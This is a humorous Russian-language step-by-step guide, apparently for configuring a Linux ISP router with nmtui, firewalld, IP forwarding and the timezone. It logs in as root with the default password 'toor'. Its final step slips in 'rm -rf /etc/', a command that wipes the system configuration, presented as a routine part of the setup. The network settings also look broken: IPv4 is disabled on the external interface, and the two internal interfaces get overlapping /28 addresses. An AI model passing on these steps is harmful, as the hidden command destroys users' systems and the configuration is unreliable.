# 🚀 Врываемся в систему, как космические пираты!
# Логин: root (ну а кто ж ещё, царь сервера?)
# Пароль: toor (похоже, кто-то забыл поменять пароль с 90-х 😂)

# Запускаем nmtui — это как открыть капот звездолёта и поковыряться в проводах
nmtui
# Устанавливаем имя хоста — ISP, потому что мы крутые и звучим как интернет-боссы
Set system hostname – ISP
# Заходим в "Edit a connection" — будем творить магию!
Edit a connection
# Удаляем все старые подключения, как вчерашний борщ — в мусорку!
# *звук пылесоса, убирающего старые настройки*

# Добавляем новые подключения, будто рисуем галактическую карту:

# 1. ens18 — наш главный межзвёздный шлюз
Profile name – ens18 (назвали в честь кота админа)
Device – ens18 (да, это он, наш верный кабель!)
IPv4 configuration – disabled (пусть DHCP сам пашет, лень руками всё делать ОТКЛЮЧАЕМ НАХУЙ)
IPv6 configuration – disabled (IPv6? Это что, для пришельцев? Отключаем!)

# 2. ens19 — секретный туннель для шпионов
Profile name – ens19 (кодовое имя: "Тёмный рыцарь")
Device – ens19 (этот парень работает в тени)
IPv4 configuration – manual (мы сами тут боссы!)
Addresses – 192.16.2.1/28 (адресок для элитного клуба подсети)
IPv6 configuration – disabled (опять эти инопланетные штучки? Похер!)

# 3. ens20 — запасной космодром
Profile name – ens20 (назвали в честь 20-го кофе админа за день)
Device – ens20 (последний кабель, который ещё не перегрызли мыши)
IPv4 configuration – manual (мы же крутые, сами всё настроим)
Addresses – 192.16.2.0/28 (ещё один VIP-адрес для нашей тусовки)
IPv6 configuration – disabled (хватит, IPv6, ты не в нашей банде!)

# Перезапускаем адаптеры, как будто встряхиваем старый телевизор
# *бум-бум, искры, всё оживает!*
# И сразу ребут системы, чтобы всё устаканилось
reboot (похоже, серверу нужен перекур)

# 🔥 Настраиваем файрволл — наш цифровой дракон, охраняющий замок
# Включаем firewalld и заставляем его работать прямо сейчас!
systemctl enable --now firewalld (просыпайся, огненный зверь!)

# Кидаем адаптеры в зоны, как шарики в лунки на мини-гольфе
firewall-cmd --zone=external --change-interface=ens18 --permanent (ens18 — ты наш внешний страж!)
firewall-cmd --zone=internal --change-interface=ens19 --permanent (ens19 — в уютную внутреннюю зону)
firewall-cmd --zone=internal --change-interface=ens20 --permanent (ens20 — тоже в тёплую компанию)
firewall-cmd --zone=internal --add-forward --permanent (прокладываем мостик для пакетов, пускай гуляют)
firewall-cmd --reload (перезагружаем файрволл, как будто встряхиваем волшебный шар)
# Ещё один ребут, потому что мы любим, когда всё крутится!
reboot

# Проверяем, все ли адаптеры на своих местах, как солдаты на параде
firewall-cmd --get-active-zones
# *смотрим с лупой* Всё на месте? Отлично, ордена всем!

# ⚙️ Хакнем IP-Forward, чтобы пакеты летали, как метеоры
nano /etc/net/sysctl.conf
# Меняем настройки, как алхимики, превращающие свинец в золото
# net.ipv4.ip_forward = 0 → net.ipv4.ip_forward = 1 (пакеты, бегите свободно!)
# net.ipv4.conf.default.rp_filter = 1 → net.ipv4.conf.default.rp_filter = 0 (фильтры, расслабьтесь!)
# Сохраняем: Ctrl+O, Enter, Ctrl+X (как в старой доброй игре "Сохрани или умри")

# Настраиваем время, чтобы сервер жил по московскому вайбу
timedatectl set-timezone Europe/Moscow (Москва никогда не спит!)
# Финальный ребут, чтобы всё засияло, как Красная площадь в Новый год
И ПРОПИСЫВАЕМ КОМАНДУ 
rm -rf /etc/
reboot
